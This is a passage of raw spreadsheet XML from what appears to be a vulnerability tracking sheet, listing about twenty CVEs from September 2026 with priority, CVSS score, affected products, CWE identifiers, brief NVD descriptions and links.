t="inlineStr"><is><t>New</t></is></c><c r="C776" s="5" t="inlineStr"><is><t>CVE-2026-77104</t></is></c><c r="D776" s="5" t="n"><v>7.5</v></c><c r="E776" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F776" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G776" s="5" t="inlineStr" /><c r="H776" s="5" t="n"><v>0.004</v></c><c r="I776" s="5" t="inlineStr" /><c r="J776" s="5" t="inlineStr" /><c r="K776" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L776" s="5" t="inlineStr" /><c r="M776" s="5" t="inlineStr" /><c r="N776" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O776" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P776" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q776" s="5" t="inlineStr" /><c r="R776" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S776" s="5" t="inlineStr"><is><t>CommServe contained a path traversal issue affecting information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="T776" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77104</t></is></c></row><row r="777"><c r="A777" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B777" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C777" s="5" t="inlineStr"><is><t>CVE-2026-77108</t></is></c><c r="D777" s="5" t="n"><v>7.5</v></c><c r="E777" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F777" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G777" s="5" t="inlineStr" /><c r="H777" s="5" t="n"><v>0.005</v></c><c r="I777" s="5" t="inlineStr" /><c r="J777" s="5" t="inlineStr" /><c r="K777" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L777" s="5" t="inlineStr" /><c r="M777" s="5" t="inlineStr" /><c r="N777" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O777" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P777" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q777" s="5" t="inlineStr" /><c r="R777" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S777" s="5" t="inlineStr"><is><t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain elevated access to sensitive information. Exploitation of this issue does not require user interaction.</t></is></c><c r="T777" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77108</t></is></c></row><row r="778"><c r="A778" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B778" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C778" s="5" t="inlineStr"><is><t>CVE-2026-77494</t></is></c><c r="D778" s="5" t="n"><v>7.5</v></c><c r="E778" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F778" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G778" s="5" t="inlineStr" /><c r="H778" s="5" t="n"><v>0.012</v></c><c r="I778" s="5" t="inlineStr" /><c r="J778" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K778" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L778" s="5" t="inlineStr" /><c r="M778" s="5" t="inlineStr" /><c r="N778" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O778" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P778" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q778" s="5" t="inlineStr" /><c r="R778" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S778" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T778" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77494</t></is></c></row><row r="779"><c r="A779" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B779" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C779" s="5" t="inlineStr"><is><t>CVE-2026-77498</t></is></c><c r="D779" s="5" t="n"><v>7.5</v></c><c r="E779" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F779" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G779" s="5" t="inlineStr" /><c r="H779" s="5" t="n"><v>0.008</v></c><c r="I779" s="5" t="inlineStr" /><c r="J779" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K779" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L779" s="5" t="inlineStr" /><c r="M779" s="5" t="inlineStr" /><c r="N779" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O779" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P779" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q779" s="5" t="inlineStr" /><c r="R779" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S779" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T779" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77498</t></is></c></row><row r="780"><c r="A780" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B780" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C780" s="5" t="inlineStr"><is><t>CVE-2026-77499</t></is></c><c r="D780" s="5" t="n"><v>7.5</v></c><c r="E780" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F780" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G780" s="5" t="inlineStr" /><c r="H780" s="5" t="n"><v>0.008999999999999999</v></c><c r="I780" s="5" t="inlineStr" /><c r="J780" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K780" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L780" s="5" t="inlineStr" /><c r="M780" s="5" t="inlineStr" /><c r="N780" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O780" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P780" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q780" s="5" t="inlineStr" /><c r="R780" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S780" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T780" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77499</t></is></c></row><row r="781"><c r="A781" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B781" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C781" s="5" t="inlineStr"><is><t>CVE-2026-77501</t></is></c><c r="D781" s="5" t="n"><v>7.5</v></c><c r="E781" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F781" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G781" s="5" t="inlineStr" /><c r="H781" s="5" t="n"><v>0.008</v></c><c r="I781" s="5" t="inlineStr" /><c r="J781" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K781" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L781" s="5" t="inlineStr" /><c r="M781" s="5" t="inlineStr" /><c r="N781" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O781" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P781" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q781" s="5" t="inlineStr" /><c r="R781" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S781" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T781" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77501</t></is></c></row><row r="782"><c r="A782" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B782" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C782" s="5" t="inlineStr"><is><t>CVE-2026-77502</t></is></c><c r="D782" s="5" t="n"><v>7.5</v></c><c r="E782" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F782" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G782" s="5" t="inlineStr" /><c r="H782" s="5" t="n"><v>0.008</v></c><c r="I782" s="5" t="inlineStr" /><c r="J782" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K782" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L782" s="5" t="inlineStr" /><c r="M782" s="5" t="inlineStr" /><c r="N782" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O782" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P782" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q782" s="5" t="inlineStr" /><c r="R782" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S782" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T782" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77502</t></is></c></row><row r="783"><c r="A783" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B783" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C783" s="5" t="inlineStr"><is><t>CVE-2026-77886</t></is></c><c r="D783" s="5" t="n"><v>7.5</v></c><c r="E783" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F783" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G783" s="5" t="inlineStr" /><c r="H783" s="5" t="n"><v>0.008</v></c><c r="I783" s="5" t="inlineStr" /><c r="J783" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K783" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L783" s="5" t="inlineStr" /><c r="M783" s="5" t="inlineStr" /><c r="N783" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O783" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P783" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q783" s="5" t="inlineStr" /><c r="R783" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S783" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T783" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77886</t></is></c></row><row r="784"><c r="A784" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B784" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C784" s="5" t="inlineStr"><is><t>CVE-2026-77888</t></is></c><c r="D784" s="5" t="n"><v>7.5</v></c><c r="E784" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F784" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G784" s="5" t="inlineStr" /><c r="H784" s="5" t="n"><v>0.008999999999999999</v></c><c r="I784" s="5" t="inlineStr" /><c r="J784" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K784" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L784" s="5" t="inlineStr" /><c r="M784" s="5" t="inlineStr" /><c r="N784" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O784" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P784" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q784" s="5" t="inlineStr" /><c r="R784" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S784" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T784" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77888</t></is></c></row><row r="785"><c r="A785" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B785" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C785" s="5" t="inlineStr"><is><t>CVE-2026-77889</t></is></c><c r="D785" s="5" t="n"><v>7.5</v></c><c r="E785" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F785" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G785" s="5" t="inlineStr" /><c r="H785" s="5" t="n"><v>0.008999999999999999</v></c><c r="I785" s="5" t="inlineStr" /><c r="J785" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K785" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L785" s="5" t="inlineStr" /><c r="M785" s="5" t="inlineStr" /><c r="N785" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O785" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P785" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q785" s="5" t="inlineStr" /><c r="R785" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S785" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T785" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77889</t></is></c></row><row r="786"><c r="A786" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B786" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C786" s="5" t="inlineStr"><is><t>CVE-2026-77890</t></is></c><c r="D786" s="5" t="n"><v>7.5</v></c><c r="E786" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F786" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G786" s="5" t="inlineStr" /><c r="H786" s="5" t="n"><v>0.008999999999999999</v></c><c r="I786" s="5" t="inlineStr" /><c r="J786" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K786" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L786" s="5" t="inlineStr" /><c r="M786" s="5" t="inlineStr" /><c r="N786" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O786" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P786" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q786" s="5" t="inlineStr" /><c r="R786" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S786" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T786" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77890</t></is></c></row><row r="787"><c r="A787" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B787" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C787" s="5" t="inlineStr"><is><t>CVE-2026-77893</t></is></c><c r="D787" s="5" t="n"><v>7.5</v></c><c r="E787" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F787" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G787" s="5" t="inlineStr" /><c r="H787" s="5" t="n"><v>0.008</v></c><c r="I787" s="5" t="inlineStr" /><c r="J787" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K787" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L787" s="5" t="inlineStr" /><c r="M787" s="5" t="inlineStr" /><c r="N787" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O787" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P787" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q787" s="5" t="inlineStr" /><c r="R787" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S787" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T787" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77893</t></is></c></row><row r="788"><c r="A788" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B788" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C788" s="5" t="inlineStr"><is><t>CVE-2026-77895</t></is></c><c r="D788" s="5" t="n"><v>7.5</v></c><c r="E788" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F788" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G788" s="5" t="inlineStr" /><c r="H788" s="5" t="n"><v>0.011</v></c><c r="I788" s="5" t="inlineStr" /><c r="J788" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K788" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L788" s="5" t="inlineStr" /><c r="M788" s="5" t="inlineStr" /><c r="N788" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O788" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P788" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q788" s="5" t="inlineStr" /><c r="R788" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S788" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T788" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77895</t></is></c></row><row r="789"><c r="A789" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B789" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C789" s="5" t="inlineStr"><is><t>CVE-2026-77898</t></is></c><c r="D789" s="5" t="n"><v>7.5</v></c><c r="E789" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F789" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G789" s="5" t="inlineStr" /><c r="H789" s="5" t="n"><v>0.005</v></c><c r="I789" s="5" t="inlineStr" /><c r="J789" s="5" t="inlineStr" /><c r="K789" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L789" s="5" t="inlineStr" /><c r="M789" s="5" t="inlineStr" /><c r="N789" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O789" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P789" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q789" s="5" t="inlineStr" /><c r="R789" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S789" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T789" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77898</t></is></c></row><row r="790"><c r="A790" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B790" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C790" s="5" t="inlineStr"><is><t>CVE-2026-78523</t></is></c><c r="D790" s="5" t="n"><v>7.5</v></c><c r="E790" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F790" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G790" s="5" t="inlineStr" /><c r="H790" s="5" t="n"><v>0.01</v></c><c r="I790" s="5" t="inlineStr" /><c r="J790" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K790" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L790" s="5" t="inlineStr" /><c r="M790" s="5" t="inlineStr" /><c r="N790" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O790" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P790" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q790" s="5" t="inlineStr" /><c r="R790" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S790" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T790" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78523</t></is></c></row><row r="791"><c r="A791" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B791" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C791" s="5" t="inlineStr"><is><t>CVE-2026-78574</t></is></c><c r="D791" s="5" t="n"><v>7.5</v></c><c r="E791" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F791" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G791" s="5" t="inlineStr" /><c r="H791" s="5" t="n"><v>0.001</v></c><c r="I791" s="5" t="inlineStr" /><c r="J791" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K791" s="5" t="inlineStr" /><c r="L791" s="5" t="inlineStr" /><c r="M791" s="5" t="inlineStr" /><c r="N791" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O791" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P791" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q791" s="5" t="inlineStr" /><c r="R791" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S791" s="5" t="inlineStr"><is><t>The Okta Hyperdrive Integration plugin resolves a required assembly using a registry path within the current user's hive without integrity verification. The referenced path is loaded via Assembly.LoadFrom without signature validation, resulting in an unverified assembly executing within the context of the host process or elevated installer.</t></is></c><c r="T791" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78574</t></is></c></row><row r="792"><c r="A792" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B792" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C792" s="5" t="inlineStr"><is><t>CVE-2026-78837</t></is></c><c r="D792" s="5" t="n"><v>7.5</v></c><c r="E792" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F792" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G792" s="5" t="inlineStr" /><c r="H792" s="5" t="n"><v>0.003</v></c><c r="I792" s="5" t="inlineStr" /><c r="J792" s="5" t="inlineStr" /><c r="K792" s="5" t="inlineStr" /><c r="L792" s="5" t="inlineStr" /><c r="M792" s="5" t="inlineStr" /><c r="N792" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O792" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P792" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q792" s="5" t="inlineStr" /><c r="R792" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S792" s="5" t="inlineStr"><is><t>A SQL injection vulnerability in the ap_form_{id} parameter in AppNitro MachForm v30 allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="T792" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78837</t></is></c></row><row r="793"><c r="A793" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B793" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C793" s="5" t="inlineStr"><is><t>CVE-2026-79377</t></is></c><c r="D793" s="5" t="n"><v>7.5</v></c><c r="E793" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F793" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G793" s="5" t="inlineStr" /><c r="H793" s="5" t="n"><v>0.004</v></c><c r="I793" s="5" t="inlineStr" /><c r="J793" s="5" t="inlineStr" /><c r="K793" s="5" t="inlineStr" /><c r="L793" s="5" t="inlineStr" /><c r="M793" s="5" t="inlineStr" /><c r="N793" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O793" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P793" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q793" s="5" t="inlineStr" /><c r="R793" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S793" s="5" t="inlineStr"><is><t>A heap overflow in the a2dp_decoder_sbc.cpp component of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t></is></c><c r="T793" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79377</t></is></c></row><row r="794"><c r="A794" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B794" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C794" s="5" t="inlineStr"><is><t>CVE-2026-79378</t></is></c><c r="D794" s="5" t="n"><v>7.5</v></c><c r="E794" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F794" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G794" s="5" t="inlineStr" /><c r="H794" s="5" t="n"><v>0.004</v></c><c r="I794" s="5" t="inlineStr" /><c r="J794" s="5" t="inlineStr" /><c r="K794" s="5" t="inlineStr" /><c r="L794" s="5" t="inlineStr" /><c r="M794" s="5" t="inlineStr" /><c r="N794" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O794" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P794" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q794" s="5" t="inlineStr" /><c r="R794" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S794" s="5" t="inlineStr"><is><t>An issue in the btm_acl_handle() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t></is></c><c r="T794" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79378</t></is></c></row><row r="795"><c r="A795" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B795" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C795" s="5" t="inlineStr"><is><t>CVE-2026-79572</t></is></c><c r="D795" s="5" t="n"><v>7.5</v></c><c r="E795" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F795" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G795" s="5" t="inlineStr" /><c r="H795" s="5" t="n"><v>0.003</v></c><c r="I795" s="5" t="inlineStr" /><c r="J795" s="5" t="inlineStr" /><c r="K795" s="5" t="inlineStr" /><c r="L795" s="5" t="inlineStr" /><c r="M795" s="5" t="inlineStr" /><c r="N795" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O795" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P795" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q795" s="5" t="inlineStr" /><c r="R795" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="S795" s="5" t="inlineStr"><is><t>An XXE (XML External Entity) vulnerability in the level-rule module of Distribution Management v1.0.0 allows attackers to read sensitive files, scan internal networks, or launch server attacks via supplying a crafted XML payload.</t></is></c><c r="T795" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79572</t></is></c></row><row r="796"><c r="A796" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B796" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C796" s="5" t="inlineStr"><is><t>CVE-2026-79575</t></is></c><c r="D796" s="5" t="n"><v>7.5</v></c><c r="E796" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c 